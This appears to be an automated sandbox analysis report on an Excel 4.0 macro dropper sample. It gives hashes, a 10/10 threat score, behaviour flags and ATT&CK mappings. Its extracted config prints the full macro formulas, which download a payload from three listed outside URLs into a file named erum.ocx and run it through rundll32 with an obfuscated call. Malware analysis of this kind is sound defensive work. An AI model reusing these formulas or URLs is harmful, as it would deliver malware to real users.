General

  • Target

    ?i=1aexjgdkm

  • Size

    83KB

  • Sample

    220522-f55mkafha4

  • MD5

    bdeba7feb925b8151d7f8df5271d7dbc

  • SHA1

    4524ac7e23b673eb9ba92b304d20daf3b8453e51

  • SHA256

    fc47084706c46ae94ca1c083194cef43af916b75afb8afef6f9fa59105067001

  • SHA512

    80cdf16061091e9ce3760931239647a17fdd3483aa9276f1bb8e05399f308b4116e7e665100fd9c7fafacb1be87fb4dfb87b5576930dec29cca9208100750631

Score
10/10

Malware Config

Extracted

Rule
Excel 4.0 XLM Macro
C2

http://mail.emilyanncain.com/cgi-bin/A7NT3ENvn/

https://wordpress.baishuweb.com/wp-includes/10q0ice6/

http://monorailegypt.com/wp-admin/6uBf9CCfZRMh/

Attributes
  • formulas

    =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://mail.emilyanncain.com/cgi-bin/A7NT3ENvn/","..\erum.ocx",0,0) =IF('EWDFFEFAD'!E18<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"https://wordpress.baishuweb.com/wp-includes/10q0ice6/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E20<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://monorailegypt.com/wp-admin/6uBf9CCfZRMh/","..\erum.ocx",0,0)) =IF('EWDFFEFAD'!E22<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\rundll32.exe ..\erum.ocx,D""&""l""&""lR""&""egister""&""Serve""&""r") =RETURN()

Extracted

Language
xlm4.0
Source
URLs
xlm40.dropper

http://mail.emilyanncain.com/cgi-bin/A7NT3ENvn/

Targets

    • Target

      ?i=1aexjgdkm

    • Size

      83KB

    • MD5

      bdeba7feb925b8151d7f8df5271d7dbc

    • SHA1

      4524ac7e23b673eb9ba92b304d20daf3b8453e51

    • SHA256

      fc47084706c46ae94ca1c083194cef43af916b75afb8afef6f9fa59105067001

    • SHA512

      80cdf16061091e9ce3760931239647a17fdd3483aa9276f1bb8e05399f308b4116e7e665100fd9c7fafacb1be87fb4dfb87b5576930dec29cca9208100750631

    Score
    10/10
    • Process spawned unexpected child process

      This typically indicates the parent process was compromised via an exploit or macro.

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Tasks